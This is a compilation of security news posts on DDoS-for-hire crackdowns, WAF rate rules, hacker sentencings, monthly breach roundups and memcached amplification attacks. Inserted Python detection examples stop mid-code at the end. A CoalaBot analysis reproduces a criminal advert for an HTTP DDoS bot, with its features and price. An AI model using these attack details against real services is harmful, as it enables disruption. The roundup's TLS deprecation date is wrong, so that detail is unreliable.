“Size does not matter – all levels of users are under the radar of law enforcement, be it a gamer booting the competition out of a game, or a high-level hacker carrying out DDoS attacks against commercial targets for financial gain.”

UK police have already raided the homes of several users, and in the Netherlands authorities are working to unmask Dutch users of the service. A Dutch user of Webstresser has already received an alternative sanction.

Europol revealed that other countries, including the United States, Belgium, Croatia, France, Germany, Greece, Denmark, Romania, Estonia, Hungary, Ireland, Switzerland, Norway, Lithuania, Portugal, Slovenia, Sweden, Australia, Colombia, Serbia, have also joined the fight against DDoS attacks.

“Emboldened by a perceived anonymity, many young IT enthusiasts get involved in this seemingly low-level crime, unaware of the consequences that such online activities can carry. Cybercrime isn’t a victimless crime and it is taken extremely seriously by law enforcement. The side effects a criminal investigation could have on the lives of these teenagers can be serious, going as far as a prison sentence in some countries.” concludes Europol.

“Skills in coding, gaming, computer programming, cyber security or anything IT-related are in high demand and there are many careers and opportunities available to use these wisely.”


Pierluigi Paganini


The post Law enforcement worldwide hunting users of DDoS-for-Hire services appeared first on Security Affairs.

Why You Need to Block the Threat Factory. Not Just the Threats.


Cyber criminals will create roughly 100 million new malware variants over the next 12 months. Security vendors will respond with new malware signatures and behaviors to stop them, but thousands of companies will be victimized in the process, experiencing costly or catastrophic breaches. This isn’t new - it’s a cycle.

SSDP amplification attacks rose 639%

The Nexusguard Q3 2018 Threat Report has revealed the emergence of an extremely stealthy DDoS attack pattern targeting communications service providers (CSPs). This new vector exploits the large attack surface of ASN-level (autonomous system number) CSPs by spreading tiny amounts of attack traffic across hundreds of IP addresses to evade detection. The ongoing evolution of DDoS methods suggests that CSPs need to enhance their network security … More

Comparison between normal attack traffic and attack traffic with legitimate traffic

The post SSDP amplification attacks rose 639% appeared first on Help Net Security.

Researchers analyze DDoS attacks as coordinated gang activities

In a new report, NSFOCUS introduced the IP Chain-Gang concept, in which each chain-gang is controlled by a single threat actor or a group of related threat actors and exhibits similar behavior across the various attacks conducted by the same gang. Researchers analyzed attack types, volume, size of events, gang activities, and attack rates. By studying the historical behavior of the 80 gangs identified in the report, … More

IP Gang attack-type classification against attack volume size

The post Researchers analyze DDoS attacks as coordinated gang activities appeared first on Help Net Security.

Smashing Security #111: When rivals hack, and ‘extreme’ baby monitors


Why a business spat resulted in Liberia falling off the internet, how the US Government shutdown is impacting website security, and the perplexing world of extreme IoT devices.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guest Zoë Rose.

Imperva Increases Self-Service Capability Fourfold with Custom Security Rules

Back in 2014, we introduced Rules (previously IncapRules) to give our customers advanced control over their application security.

Today we’re putting even more of this custom tuning power in the hands of our customers by quadrupling the number of filters available via self-service.

Rules Basics

Rules are an extensive policy engine developed in response to the emergence of increasingly advanced threats as well as the growing demand to add more logic at the edge. Advanced threats continue to drive the need for adaptive security solutions which enable real-time response and flexible, custom security policy enforcement.

Rules are built using filters, operators, and values. Filters are the core function which helps tune manual policies. Customers use filters for advanced bot protection, security against brute-force attacks, and more. Although about 90% of our customers use our out-of-the-box policies in their default preventative settings, leaving the burden of tuning to the Imperva security experts, there are times when some of our customers need to make specific adjustments to their security policies.

The Existing Filter Set

Traditionally, Imperva has limited the list of filters exposed to customers to 20. This set of parameters is available for self-service use when defining Rules.

Filters for Rules are divided into three logical groups:

  1. Clients: Information about the connecting client
  2. Requests: Information about the current request
  3. Counters/rates: A running count of the number of actions performed

As one example, there’s an existing filter for the ID of the client application, with values such as:

  • Googlebot (Search bot) (6)
  • cURL (Developer Tool) (47)

When adding or editing a rule in the Management Console, you start entering text in the value field to display a list of available values.

Example: ClientId == 15

The New Filters

Behind the scenes, the Imperva Support team and SOC alone have had much more power up until now in terms of custom tuning upon request, with access to approximately 100 different filters.

But by expanding the set of Rules available via self-service to a total of 48 filters, even more policy customization is possible without ever needing to contact the Support team.  

To complement existing self-service Rules for bot protection, protection against Account Takeover (ATO), application hardening, rate limiting, and Advanced Access Control (ACL), the new filters offer the following and more:

  • Advanced optionality when handling advanced bot scenarios
  • Logic based on popular technologies such as Drupal, PHP, Joomla, WordPress and others
    (the idea here is to simplify complex expressions by encapsulating the tech detection and rates within a single command)
  • Client certificate info such as CN, SHA1 and Serial Number


Here are three examples of new filters unveiled to customers:

(1) session-creation-ip_rate

If you set the value here to, say, 800, you will be able to capture sessions with more than 800 requests from a certain IP in 1 minute – a likely indicator of a DDoS attack.

(2) request-rate-ip_rate

This filter measures the rate of requests per IP over a 1-minute period. If you expect no more than 100 requests per minute from a single client, you can set the action to “block” or “alert” when that rate is exceeded, because a higher rate could indicate that an attacker is trying to scrape your website.

(3) login-bf-drupal_rate

Though we patch by default from the backend to mitigate known exposures such as the latest critical RCE vulnerabilities affecting Drupal, this filter may be useful for our more advanced customers who wish to add an extra layer of logic and protection.

The filter allows you to measure the rate of requests per IP over a period of time to a Drupal login page, helping in detection and prevention of brute-force attacks on Drupal login pages.
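The three rate filters above can all be modelled as per-IP counters over a sliding one-minute window. The following Python is an added illustration, not Imperva's rule engine or Rules syntax: it replays constructed web-server log lines and reports which IPs would trip each rule, using the 800 and 100 thresholds quoted above; the Drupal login path /user/login, the brute-force threshold of 5 and the "request without a session cookie creates a new session" heuristic are assumptions.

```python
"""Added example: evaluating per-IP rate rules over constructed log lines.

Illustrative code only; not Imperva's rule engine. Log format, Drupal login
path, the brute-force threshold and the session heuristic are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=1)

# Thresholds: 800 and 100 come from the article's examples; 5 is assumed.
RULES = {
    "session-creation-ip_rate": 800,  # new sessions per IP per minute
    "request-rate-ip_rate": 100,      # requests per IP per minute
    "login-bf-drupal_rate": 5,        # POSTs to the Drupal login form per IP per minute
}

DRUPAL_LOGIN_PATH = "/user/login"  # assumed location of the Drupal login form


def parse_line(line):
    """Parse a constructed line: '<ISO time> <ip> <method> <path> <has_session_cookie 0|1>'."""
    ts, ip, method, path, has_cookie = line.split()
    return datetime.fromisoformat(ts), ip, method, path, has_cookie == "1"


class RateCounter:
    """Per-IP sliding-window counter: how many events in the last WINDOW."""

    def __init__(self):
        self.events = defaultdict(deque)

    def add(self, ip, ts):
        q = self.events[ip]
        q.append(ts)
        while q and ts - q[0] >= WINDOW:   # drop events that fell out of the window
            q.popleft()
        return len(q)


def evaluate(lines):
    """Return {rule_name: set(ip)} of IPs that exceeded each rule's threshold."""
    counters = {name: RateCounter() for name in RULES}
    hits = {name: set() for name in RULES}
    for line in lines:
        ts, ip, method, path, has_cookie = parse_line(line)
        applies = {
            "request-rate-ip_rate": True,
            # Heuristic: a request carrying no session cookie makes the edge open a new session.
            "session-creation-ip_rate": not has_cookie,
            "login-bf-drupal_rate": method == "POST" and path == DRUPAL_LOGIN_PATH,
        }
        for name, counted in applies.items():
            if counted and counters[name].add(ip, ts) > RULES[name]:
                hits[name].add(ip)
    return hits


def build_sample():
    """Constructed log sample (not real traffic) that exercises each rule once."""
    base = datetime(2019, 1, 1, 12, 0, 0)
    lines = []
    # Scraper: 150 cookie-bearing GETs in 30 s -> request-rate-ip_rate only.
    for i in range(150):
        t = (base + timedelta(milliseconds=200 * i)).isoformat()
        lines.append(f"{t} 203.0.113.7 GET /products?page={i} 1")
    # Flood: 900 cookieless GETs in 45 s -> session-creation and request-rate.
    for i in range(900):
        t = (base + timedelta(milliseconds=50 * i)).isoformat()
        lines.append(f"{t} 198.51.100.20 GET / 0")
    # Brute force: 6 POSTs to the Drupal login form in 15 s -> login-bf-drupal_rate only.
    for i in range(6):
        t = (base + timedelta(seconds=3 * i)).isoformat()
        lines.append(f"{t} 198.51.100.9 POST /user/login 1")
    # Legitimate visitor: 30 requests spread over 3 minutes -> no rule fires.
    for i in range(30):
        t = (base + timedelta(seconds=6 * i)).isoformat()
        lines.append(f"{t} 192.0.2.1 GET /about 1")
    lines.sort(key=lambda l: datetime.fromisoformat(l.split()[0]))
    return lines


if __name__ == "__main__":
    for rule, ips in evaluate(build_sample()).items():
        print(f"{rule}: {sorted(ips) or 'no hits'}")
```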

The Demand for Logic at the Edge

The customer policy rule engine has proven to be a powerful tool when you need to perform specialized adjustments for specific use cases. Advanced options for building custom security policies complement the default prevention settings in our cloud WAF for complete protection.  

But as organizations of all sizes shift to the cloud and our enterprise customer list has expanded rapidly in turn, the demand for more edge functionality has also increased. We’ve heard time and again that our customers find it very appealing to be able to add advanced logic rules at the edge.

Last year we announced the rollout of advanced Application Delivery Rules. And while we invested in building and improving the engine which drives both of these rule sets, we homed in on the need to (1) develop advanced filters which can help address emerging threats and exploitation and (2) expose logical parts of our classification engine and bot protection layers previously hidden from customer view.

The Move to More Control and Visibility

The newly visible Rules will provide a much more powerful tool for savvy customers who need to tune their policies in order to handle complex cases. This approach is yet another step we’re taking to put enhanced visibility and extended control in our customers’ hands and to stay ahead of the curve in handling the most sophisticated and automated attacks out there.

The post Imperva Increases Self-Service Capability Fourfold with Custom Security Rules appeared first on Blog.

The DDoS attacker rescued by a Disney cruise ship is sentenced to over 10 years in prison

A 34-year old man has been sentenced to more than 10 years in prison, after being found guilty of launching a massive denial-of-service attack against Boston Children’s Hospital.

The sentencing of Martin Gottesfeld, from Somerville, Massachusetts, comes almost three years after he attempted to escape to Cuba – a plan that failed after his speedboat broke down in the choppy sea, and he was picked up by a Disney cruise liner.

Gottesfeld’s troubles began when he heard about the case of Connecticut teenager Justina Pelletier, who was admitted to Boston Children’s Hospital in 2013. The hospital and Pelletier’s parents disagreed about how she should be treated, and eventually she was removed from her parents’ custody.

The case received widespread attention in the media and online, as the teenage girl’s parents argued that she had been “medically kidnapped”.

Publicity about the case spurred an internet campaign under the banner of #FreeJustina, and Gottesfeld, in the name of the Anonymous hacking collective, posted a YouTube video in March 2014 calling for action against the hospital.

That video, in turn, shared links to a Pastebin account – doxing the home address and phone numbers of a judge and doctor involved in Pelletier’s case, and making a clear threat:

“This will be your first and final warning. Failure to comply will result in retaliation which you will not be able to withstand. Free Justina and return her home to her family. The voice of the people will be heard.”

Gottesfeld linked to the information from his Twitter account, where he frequently posted about the #FreeJustina campaign.

At the same time, Gottesfeld launched a distributed denial-of-service (DDoS) attack against Wayside Youth & Family Support Network, a facility offering children mental health counselling. Pelletier was a resident of the facility having been by then discharged from hospital, but still not released into the care of her parents.

The following month Gottesfeld launched another DDoS attack, this time crippling the systems of Boston Children’s Hospital. Prosecutors claimed that the attack knocked the hospital’s internet systems offline for two weeks, disrupting fundraising campaigns and communication between patients and medical staff.

Perhaps unsurprisingly, FBI investigators were able to link Gottesfeld to the YouTube account. For his part, Gottesfeld claims he deliberately didn’t bother covering his tracks as he didn’t believe he had done anything wrong.

In the early morning of October 1, 2014, FBI investigators searched Gottesfeld’s home, seizing computer equipment.

As the investigation into the DDoS attacks proceeded over the coming months, Gottesfeld realised the seriousness of the case against him – and in February 2016 fled with his wife Dana to Miami. Their plan? To buy a boat off Craigslist, and sail it to Cuba where they would be beyond the reach of US authorities.

The couple purchased a speedboat for US $5000, abandoned their car, and immediately set off across the ocean for what they believed to be the sanctuary of Cuba. But after hours of battling rough waves, their boat broke down. They were stranded, with no boats or land in sight. And they had told no-one of their plan.

Attempts to restart the boat failed, and eventually Gottesfeld admitted defeat – putting a distress call out on the radio which was thankfully heard by “The Disney Wonder”, an 11-deck cruise ship carrying hundreds of tourists.

In terrible weather conditions, Martin and Dana Gottesfeld were brought safely onboard where they were held in a cabin, with guards stationed outside.

Authorities in the Bahamas contacted the FBI office in Boston, and when the cruise ship returned to the US mainland, Gottesfeld and his wife were arrested and handcuffed.

The hacker’s dream of escape to Cuba was in tatters.

On Thursday, Gottesfeld was sentenced to 121 months in prison, and ordered to pay nearly US $443,000 in restitution.

“Make no mistake, your crime was contemptible, invidious and loathsome,” said US District Judge Nathaniel Gorton.

To read more about the case, and Gottesfeld’s background, I strongly recommend reading this article in Rolling Stone.

There’s no doubt that Gottesfeld did many foolish things, but when you read more about the case (Check out this excellent article in Rolling Stone which explores his background) you can’t help but conclude that he had ultimately good intentions that were catastrophically misdirected.

A prison sentence of over 10 years for the DDoS attacks that Martin Gottesfeld perpetrated feels very harsh to me.

Gottesfeld says he plans to appeal his sentence. I can’t condone what he did, but I wish him well for the future.

Man whose DDoS attacks took down entire country’s Internet jailed

By Waqas

A court in London has sentenced a British and Israeli cyber criminal, Daniel Kaye aka “BestBuy and Popopret”, to two years and eight months in prison for conducting large-scale DDoS attacks on Lonestar Cell MTN, disrupting the country’s Internet and causing tens of millions of dollars in damages. Kaye (30) was charged for DDoS attacks against British and German […]


Cyber Security Roundup for October 2018

Aside from Brexit, Cyber Threats and Cyber Attack accusations against Russia are very much on the centre stage of UK government's international political agenda at the moment. The government publicly accused Russia's military 'GRU' intelligence service of being behind four high-profile cyber-attacks, and named 12 cyber groups it said were associated with the GRU. Foreign Secretary Jeremy Hunt said, "the GRU had waged a campaign of indiscriminate and reckless cyber strikes that served no legitimate national security interest".

UK Police firmly believe the two men who carried out the Salisbury poisoning in March 2018 worked for the GRU.

The UK National Cyber Security Centre said it had assessed "with high confidence" that the GRU was "almost certainly responsible" for the cyber-attacks, and also warned UK businesses to be on the alert for indicators of compromise by the Russian APT28 hacking group. The NCSC said GRU hackers, operating under a dozen different names including Fancy Bear (APT28), had targeted:
  • The systems database of the Montreal-based World Anti-Doping Agency (Wada), using phishing to gain passwords. Athletes' data was later published 
  • The Democratic National Committee in 2016, when emails and chats were obtained and subsequently published online. The US authorities have already linked this to Russia.
  • Ukraine's Kyiv metro and Odessa airport, Russia's central bank, and two privately-owned Russian media outlets - and news agency Interfax - in October 2017. They used ransomware to encrypt the contents of a computer and demand payment 
  • An unnamed small UK-based TV station between July and August 2015, when multiple email accounts were accessed and content stolen

Facebook was fined the maximum amount of £500,000 under pre-GDPR data protection laws by the UK Information Commissioner's Office (ICO) over the Cambridge Analytica Scandal. Facebook could face a new ICO fine after revealing hackers had accessed the contact details of 30 Million users due to a flaw with Facebook profiles. The ICO also revealed a 400% increase in reported Cyber Security Incidents and another report by a legal firm RPC said the average ICO fines had doubled, and to expect higher fines in the future. Heathrow Airport was fined £120,000 by the ICO in October after a staff member lost a USB stick last October containing "sensitive personal data", which was later found by a member of the public.

Notable Significant ICO Security Related Fines

Last month's British Airways website hack was worse than originally reported, as they disclosed a second attack which occurred on 5th September 2018, when the payment page had 22 lines of malicious Javascript code injected in an attack widely attributed to Magecart.  Another airline Cathay Pacific also disclosed it had suffered a major data breach that impacted 9.4 million customer's personal data and some credit card data.

Morrisons has lost a challenge to a High Court ruling which made it liable for a data breach, after an employee, since jailed for 8 years, stole and posted thousands of its employees' details online in 2014. Morrisons said it would now appeal to the Supreme Court; if that appeal fails, those affected will be able to claim compensation for "upset and distress".

Interesting article on Bloomberg on "How China Used a Tiny Chip to Infiltrate U.S. Companies". However, there was a counter-narrative to the Bloomberg article on Sky News. That didn't stop ex-Security Minister Admiral Lord West calling out the Chinese when he said Chinese IT kit 'is putting all of us at risk' if used in 5G. He raises a valid point, given the US Commerce Department said it would restrict the export of software and technology goods from American firms to Chinese chipmaker Fujian Jinhua. BT, which uses Huawei to supply parts for its network, told Sky News that it would "apply the same stringent security measures and controls to 5G when we start to roll it out, in line with continued guidance from government". Recently there have been warnings issued by the MoD and NCSC stating that a Chinese espionage group known as APT10 is attacking IT suppliers to target military and intelligence information.

NCSC is seeking feedback on the latest drafts 'knowledge areas' on CyBOK, a Cyber Security body of knowledge which it is supporting along with academics and the general security industry.

Google is finally pulling the plug on Google+, after user personal data was left exposed. Google and the other three major web browser providers said, in what seem like coordinated announcements, that businesses must accept TLS versions 1.0 and 1.1 will no longer be supported after Q1 2018.

So it's time to move over to the more secure TLS v1.2 or the more secure and efficient TLS v1.3.


Cyber Security Roundup for August 2018

The largest data breach disclosed this month was by T-Mobile; the telecoms giant said there had been "unauthorised access" to potentially 2 million of their 77 million customer accounts. According to the media, a hacker took advantage of a vulnerability in a T-Mobile API (application programming interface). A vulnerable API used by the Air Canada mobile app was also exploited, resulting in the compromise of 20,000 Air Canada customer accounts. Air Canada promptly forced a password change on all of its 77 million customer accounts as a result; however, the airline faced criticism from security experts for advising a weak password strength, namely a password length of 8 made up of just characters and digits. Both of these hacks underline the importance of regularly penetration testing apps and their supporting infrastructure, including their APIs.

Hackers stole up to 34,000 Butlin guest records, reportedly breaching the UK holiday camp firm through a phishing email. Dixons Carphone upped the estimated number of customer records breached in a hack last year from 1.2 million to 10 million, which includes 5.9 million payment cards. There was no explanation offered by Dixons to why it had taken so long to get a grip on the scale of the data breach, which was reported as occurring in July 2017.

Huawei continues to face scrutiny over the security of their products after the UK National Cyber Security Centre (NCSC) issued a warning about using the Chinese tech manufacturing giant's devices in a security report. Huawei recently took over from Apple as the world's second largest provider of smartphones. A 16 year old Australian 'Apple fanboy' found himself in court after hacking into Apple's network.

On the international scene, Microsoft announced it had thwarted Russian data-stealing attacks against US anti-Trump conservative groups, by taking down six domains which hosted mimicked websites, which were likely to be used in future phishing campaigns. The Bank of Spain's website was taken out by a DDoS attack, and a Chinese Hotel Group's 140Gb customer database was found for sale on the dark web. The PGA golf championship was hit by a ransomware, and the FBI arrested three key members of the notorious FIN7 hacking group, the group is said to be responsible for stealing millions of credit card and customer details from businesses across the world.

On the personal front, the EC-Council confirmed my Computer Hacking Forensic Investigation (CHFI) certification had been renewed until 2021. I dropped into B-Sides Manchester this month; the highlight was a demonstration of a vulnerability found by Secarma researchers, namely a PHP flaw which places CMS sites at risk of remote code execution.

There were plenty of critical security patches released by the usual suspects, such as Microsoft, Cisco, and Adobe; the latter firm released several out-of-band patches during August. A critical update was released for Apache Struts (popular web server), and there was a reminder that fax machines and all-in-one network devices could be used by hackers as a way into corporate networks.

Finally, there were a couple of interesting cybercrime articles posted on the BBC's news website this month: "Cyber-Attack! Would your firm handle it better than this?" and "Unpicking the Cyber-Crime Economy".


Cyber Security Roundup for March 2018

In the wake of the global political fallout over the Salisbury nerve agent attack, there are reports of a growing threat of Russian state or Russian state-affiliated hacking groups conducting cyber attack reprisals against UK organisations. Government officials have directly warned bosses at electricity, gas and water firms, Whitehall departments and NHS hospitals to prepare for a state-sponsored cyber assault.

Large-scale data breaches were disclosed with Under Armour’s Fitness App MyFitnessPal (1.5 million personal records compromised), Orbitz (880k payment cards at risk), and at a Walmart partner (1.3 million personal records compromised). The latter was caused when an AWS S3 bucket holding a Walmart database was left with open access, which isn't the first time a cloud service misconfiguration has caused a major data breach.

TalkTalk was warned about its website’s poor security after a hacker known as 'B' disclosed a cross-site scripting vulnerability on the website to Sky News. TalkTalk was given a record £400,000 fine by the Information Commissioner's Office following a major website breach in October 2015, in which 157,000 customer details were stolen. The company was told to "be more diligent and more vigilant” and was fined a further £100,000 after data belonging to 21,000 customers was exposed to "rogue" staff at an Indian call centre.

GitHub survived the largest ever DDoS attack recorded thanks to Akamai DDoS protection, which peaked at a massive 1.35 terabytes of data per second.

UK schools were warned they are soft targets for cybercriminals; experts believe many schools are ill-equipped to prevent cyber thefts, with sensitive data such as children’s medical records said to be lucrative on the dark web. There have been a number of security incidents disclosed involving UK schools in recent months.
Gwent Police are facing scrutiny by the Information Commissioner's Office for not informing 450 people that hackers may have accessed their personal information, after discovering the breach over a year ago.

A hacker alleged to be behind a gang that ran the Carbanak and Cobalt bank-targeting malware has been arrested. The gang is reported to be responsible for the theft of up to a billion euros through bank transfers and from cash machines, from over 100 banks since 2013.




Weekly Cyber Risk Roundup: Record-Setting DDoS Attacks, Data Breach Costs

Last week, researchers observed a 1.35 Tbps distributed denial-of-service (DDoS) attack targeting GitHub. It was the largest DDoS attack ever recorded, surpassing the 1.2 Tbps attack against DNS provider Dyn in October 2016.

The attack leveraged a newly observed reflection and amplification vector: Internet-exposed memcached servers. Akamai researchers warned that other organizations experienced similar DDoS attacks using the new method following the GitHub attack and that even larger attacks may be possible in the future.

“Memcached can have both UDP and TCP listeners and requires no authentication,” the researchers wrote. “Since UDP is easily spoofable, it makes this service vulnerable to use as a reflector. Worse, memcached can have an amplification factor of over 50,000, meaning a 203 byte request results in a 100 megabyte response.”

The attack was mitigated within 10 minutes, GitHub said. The following day GitHub was the target of a second DDoS attack that disrupted availability for a 15-minute period, ThousandEyes reported.

“Because of its ability to create such massive attacks, it is likely that attackers will adopt memcached reflection as a favorite tool rapidly,” Akamai researchers wrote. “The good news is that providers can rate limit traffic from source port 11211 and prevent traffic from entering and exiting their networks, but this will take time.”

Wired reported there are approximately 100,000 memcached servers that currently have no authentication protection and can be abused by malicious attackers to carry out similar potentially massive, botnet-free DDoS attacks.
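The two things a defender can act on in the passages above are the traffic shape (large UDP responses arriving from source port 11211 at a victim who never asked for them) and the server-side exposure (UDP enabled on a memcached instance reachable from the Internet). The following is an added example, not code from the roundup or from Akamai: it runs a reflection check over constructed flow records and checks a memcached command line for the exposed-UDP configuration. The flow field names mirror a typical NetFlow/IPFIX export but are assumptions, as are the thresholds; the pre-1.5.6 default UDP port of 11211 and the `-U 0` / `-l` flags are memcached's own.

```python
"""Detect memcached reflection traffic and the server misconfiguration
behind it. Added example; flow records below are constructed."""
from collections import defaultdict
from dataclasses import dataclass
import shlex

MEMCACHED_PORT = 11211


@dataclass(frozen=True)
class Flow:
    """One summarised flow, roughly as a NetFlow/IPFIX collector exports it
    (field names are an assumption, not a specific collector's schema)."""
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    packets: int
    octets: int


# Constructed sample: two open reflectors answering spoofed requests toward
# one victim, plus ordinary traffic that must not be flagged.
SAMPLE_FLOWS = [
    Flow("udp", "203.0.113.10", 11211, "198.51.100.5", 443, 4000, 5_600_000_000),
    Flow("udp", "203.0.113.11", 11211, "198.51.100.5", 443, 3500, 4_900_000_000),
    Flow("udp", "203.0.113.12", 11211, "198.51.100.9", 53, 2, 260),      # small reply, benign
    Flow("udp", "192.0.2.1", 53, "198.51.100.5", 40000, 10, 2000),       # DNS, other port
    Flow("tcp", "192.0.2.2", 11211, "10.0.0.4", 50000, 100, 80_000),     # TCP: not spoofable
]


def memcached_reflection_victims(flows, min_avg_packet=1000, min_total_octets=1_000_000):
    """Return {victim_ip: (total_octets, reflector_count)}.

    Reflection shows up at the victim as UDP traffic *from* port 11211: the
    attacker spoofs the victim's address in the request, so the reflector's
    oversized reply lands on the victim. Large packets and large totals from
    many distinct 11211 sources are the signature."""
    total = defaultdict(int)
    reflectors = defaultdict(set)
    for f in flows:
        if f.proto != "udp" or f.src_port != MEMCACHED_PORT or f.packets == 0:
            continue
        if f.octets / f.packets < min_avg_packet:
            continue
        total[f.dst_ip] += f.octets
        reflectors[f.dst_ip].add(f.src_ip)
    return {ip: (o, len(reflectors[ip])) for ip, o in total.items() if o >= min_total_octets}


def memcached_udp_exposed(cmdline):
    """True when a memcached command line leaves UDP listening on a
    non-loopback address. '-U 0' disables UDP (the default from 1.5.6 on;
    this check assumes an older build where 11211 is the default) and
    '-l 127.0.0.1' keeps whatever listens off the network."""
    args = shlex.split(cmdline)
    udp_port, listen = 11211, "0.0.0.0"
    i = 0
    while i < len(args):
        a = args[i]
        if a in ("-U", "--udp-port") and i + 1 < len(args):
            udp_port = int(args[i + 1]); i += 1
        elif a.startswith("--udp-port="):
            udp_port = int(a.split("=", 1)[1])
        elif a in ("-l", "--listen") and i + 1 < len(args):
            listen = args[i + 1]; i += 1
        elif a.startswith("--listen="):
            listen = a.split("=", 1)[1]
        i += 1
    loopback_only = all(addr.strip() in ("127.0.0.1", "::1", "localhost")
                        for addr in listen.split(","))
    return udp_port != 0 and not loopback_only


if __name__ == "__main__":
    for victim, (octets, n) in memcached_reflection_victims(SAMPLE_FLOWS).items():
        print(f"{victim}: {octets / 1e9:.1f} GB from {n} memcached reflectors")
    print("exposed:", memcached_udp_exposed("memcached -m 64 -p 11211 -u memcache"))
```

The flow check is the detection Akamai's advice implies for the network edge; the config check is the host-side fix. Either the UDP listener goes away or it is bound to loopback, and both are one flag on the command line.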


Other trending cybercrime events from the week include:

  • W-2 information breached: The University of Alaska said that 50 current and former employees and students had their personal information compromised when hackers gained access to their university accounts by answering security questions and resetting their passwords. The Association for Supervision and Curriculum Development is notifying employees that their W-2 information was compromised due to a spear phishing attack. Wallace Community College Selma said that current and former employees had their W-2 information compromised when an employee fell for a phishing scam. Curtis Lumber is notifying employees that their personal information was stolen in a spear phishing attack, and some of those employees have reported issues related to filing their federal taxes following the incident.
  • Ransomware infections continue: The Colorado Department of Transportation said that computers had been reinfected with ransomware eight days after an initial attack. Both the Children’s Aid Society of Oxford County and the Family and Children’s Services of Lanark, Leeds and Grenville in Canada were the victims of a ransomware infection. Jemison Internal Medicine is notifying 6,550 patients of a ransomware infection that may have compromised their personal information.
  • Payment card breaches and service disruptions: A number of Tim Hortons locations in Canada were temporarily shut down or were forced to close their drive-throughs after malware was discovered targeting Panasonic cash registers. NIS America said that customers of its online stores had their information compromised due to being redirected to a malicious site that would harvest their information during the checkout process. North 40 is notifying customers that their payment card information may have been compromised due to unauthorized access to its e-commerce website.
  • Notable data breaches: A hacker gained access to the intranet of Germany’s government and accessed confidential information. St. Peter’s Surgery and Endoscopy Center is notifying patients that their personal and medical information may have been compromised due to unauthorized access to its servers. Healthcare vendor FastHealth submitted a data breach notification regarding unauthorized access to its web server. Porsche Japan said that the information of customers was exposed due to a hack. Metro Wire Rope Corporation said that an employee email account was compromised after the employee opened a malicious attachment with credential-stealing capabilities. The French news magazine L’Express exposed a database containing the personal information of readers and after being notified of the exposure took a month to secure the data. U.S. Marine Corps Forces Reserve may have compromised the personal information of 21,426 individuals due to sending an unencrypted email with an attachment to the wrong email distribution list.
  • Other notable events: The Financial Services Information Sharing and Analysis Center said that one of its employees was successfully phished, and the compromised email account was used to send further phishing messages to other members, affiliates, and employees. The recent hack of the PyeongChang Winter Olympics that led to Internet disruptions and website downtime was a false-flag operation carried out by Russian military spies to make it appear as if the attack was carried out by North Korea, U.S. intelligence officials said. An Arkansas man who developed the remote-access Trojan NanoCore and marketed it on Hack Forums has been sentenced to 33 months in prison.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


Equifax was back in the news this week after announcing it had discovered an additional 2.4 million U.S. consumers who were affected by its massive 2017 data breach, bringing the total number of people impacted to 147.9 million.

“This is not about newly discovered stolen data,” said Paulino do Rego Barros, Jr., Interim chief executive officer in a press release. “It’s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.”

The company also said that it expects breach-related costs to hit $275 million in 2018, which Reuters noted could make the Equifax breach the most costly hack in corporate history:

The projection, which was disclosed on a Friday morning earnings conference call, is on top of $164 million in pretax costs posted in the second half of 2017. That brings expected breach-related costs through the end of this year to $439 million, some $125 million of which Equifax said will be covered by insurance.

Those breach-related costs could rise further once legal actions from consumers and regulators are finally resolved. However, Sen. Elizabeth Warren recently stated that “Equifax is still making money off their own breach” and that even consumers who do not want to do business with them may end up buying credit protection services from another company who “very well may be using Equifax to do the back office part.”

It’s the same criticism she leveled in January when introducing a bill with Sen. Mark Warner to address problems related to credit agencies collecting data without strict protections in place to secure that information. As CNET noted, had such a bill been in place at the time of the Equifax breach, the company likely would have faced a fine of at least $14.3 billion.

CoalaBot : http Ddos Bot

CoalaBot appears to be built on August Stealer code (the panel and the traffic are very alike).

I found it spread as a task in a Betabot and in an Andromeda, spread via RIG fed by at least one HilltopAds malvertising.

2017-09-11: a witnessed infection chain to CoalaBot

A look inside :
CoalaBot: Login Screen
(August Stealer alike) 

CoalaBot: Statistics

CoalaBot: Bots

CoalaBot: Tasks
CoalaBot: Tasks

CoalaBot: New Tasks (list)

CoalaBot: https get task details

CoalaBot: http post task details

CoalaBot: Settings
Here is the translated advert, published on 2017-08-23 by a user going by the nick Discomrade.
(Thanks to Andrew Komarov and others who provided help here.)
Coala Http Ddos Bot

The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.

Attack types:

* - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.

• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7; on later OS versions .NET 2.0 is disabled by default)
• ~100kb after obfuscation
• Auto Backup (optional)
• Low CPU load for efficient use
• Encryption of incoming/outgoing traffic
• No installation on machines from former CIS countries (RU/UA/BL/KZ/...)
• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.
• Ability to link a build to more than one gate.

• Detailed statistics on time online/architecture/etc.
• List of bots, detailed information
• Number count of requests per second (total/for each bot)
• Creation of groups for attacks
• Auto sorting of bots by groups
• Creation of tasks, the ability to choose by group/country
• Setting an optional time for bots success rate


• Providing macros for randomization of sent data
• Support of .onion gate
• Ability to install an additional layer (BOT => LAYER => MAIN GATE)


• PHP 5.6 or higher
• Module for MySQLi (mysqli_nd); php-mbstring, php-json, php-mcrypt extensions


• Created tasks -


• $300 - build and panel. Up to 3 gates for one build.
• $20 - rebuild
The price can vary depending on updates.
Escrow service is welcome.

Help with installation is no charge.
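The advert sells a Layer 7 (HTTP) flood with per-bot request-rate reporting and "macros for randomization of sent data", which is what defeats a cache in front of the target. On the receiving end those same two properties are the detection: a source making requests far faster than a browser, with a query string that never repeats. The following is an added example, not code from this write-up or from the bot: it parses access-log lines in nginx/Apache combined format and flags such sources. The log lines, the threshold values and the field names in the report are constructed for illustration.

```python
"""Flag HTTP-flood sources in a web access log. Added example; the log
sample is constructed in nginx/Apache combined format."""
import re
from collections import defaultdict
from datetime import datetime

# ip ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
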